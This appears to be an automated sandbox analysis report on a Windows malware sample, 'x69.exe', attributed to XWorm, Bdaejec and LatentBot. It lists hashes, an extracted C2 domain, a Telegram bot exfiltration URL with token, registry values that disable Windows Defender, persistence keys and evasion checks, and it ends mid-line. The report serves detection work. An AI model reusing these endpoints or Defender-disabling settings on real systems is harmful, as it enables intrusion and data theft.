Resubmissions
22/05/2025, 12:12
250522-pc961stjt7 1022/05/2025, 12:11
250522-pcnysatjt2 1020/05/2025, 04:12
250520-eskwysbl9t 10Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
20/05/2025, 04:12
Static task
static1
Behavioral task
behavioral1
Sample
x69.exe
Resource
win10v2004-20250502-en
General
-
Target
x69.exe
-
Size
285KB
-
MD5
20841606ce69632f258221219aeee09b
-
SHA1
b72918797186774598792c47b66d5857be59f576
-
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
-
SHA512
aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
-
SSDEEP
6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
xworm
3.1
grayhatgroupontop.zapto.org:1177
-
Install_directory
%AppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
bdaejec
ddos.dnsnb8.net
Extracted
latentbot
grayhatgroupontop.zapto.org
Signatures
-
Bdaejec family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x000b000000023f92-82.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000001e6cd-22.dat family_xworm behavioral1/memory/464-25-0x0000000000FE0000-0x0000000000FF8000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral1/memory/4940-568-0x00000000001E0000-0x00000000001E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/1048-569-0x00000000001E0000-0x00000000001E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/1048-1510-0x00000000001E0000-0x00000000001E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4940-1509-0x00000000001E0000-0x00000000001E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2956-1511-0x00000000005F0000-0x00000000005F9000-memory.dmp family_bdaejec_backdoor -
Latentbot family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4192 created 616 4192 powershell.EXE 5 PID 4348 created 616 4348 powershell.EXE 5 -
Xworm family
-
pid Process 2300 powershell.exe 4980 powershell.exe 4896 powershell.exe 3884 powershell.exe 3736 powershell.exe 2868 powershell.exe 3424 powershell.exe 3572 powershell.exe 1520 powershell.exe 3416 powershell.exe 4888 powershell.exe 4684 powershell.exe 5032 powershell.exe 4684 powershell.exe 2292 powershell.exe 2868 powershell.exe 4676 powershell.exe 4348 powershell.EXE 3344 powershell.exe 2268 powershell.exe 3832 powershell.exe 1928 powershell.exe 3288 powershell.exe 1896 powershell.exe 5084 powershell.exe 5052 powershell.exe 964 powershell.exe 4192 powershell.EXE 4872 powershell.exe 5032 powershell.exe 4268 powershell.exe 3760 powershell.exe 2020 powershell.exe 5052 powershell.exe 4676 powershell.exe 3564 powershell.exe 4896 powershell.exe 1520 powershell.exe 2260 powershell.exe 2300 powershell.exe 4336 powershell.exe 3572 powershell.exe 3512 powershell.exe 856 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3708 netsh.exe 2120 netsh.exe -
resource yara_rule behavioral1/files/0x000f0000000226f8-50.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation iyMbXS.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe -
Executes dropped EXE 11 IoCs
pid Process 464 x69.exe 864 x69.exe 1848 x69Disable-winDefender.exe 2988 x69Disable-winDefender.exe 4940 izTLZKj.exe 1048 izTLZKj.exe 2524 x69install.exe 2956 iyMbXS.exe 3764 x69install.exe 6132 x69.exe 2132 x69.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" x69.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4192 set thread context of 6124 4192 powershell.EXE 248 PID 4348 set thread context of 2636 4348 powershell.EXE 249 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe iyMbXS.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe iyMbXS.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\Integrator.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7z.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\tnameserv.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe iyMbXS.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe izTLZKj.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe izTLZKj.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={56F93C62-742F-41DC-B6BD-FDD623ECFEA1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA 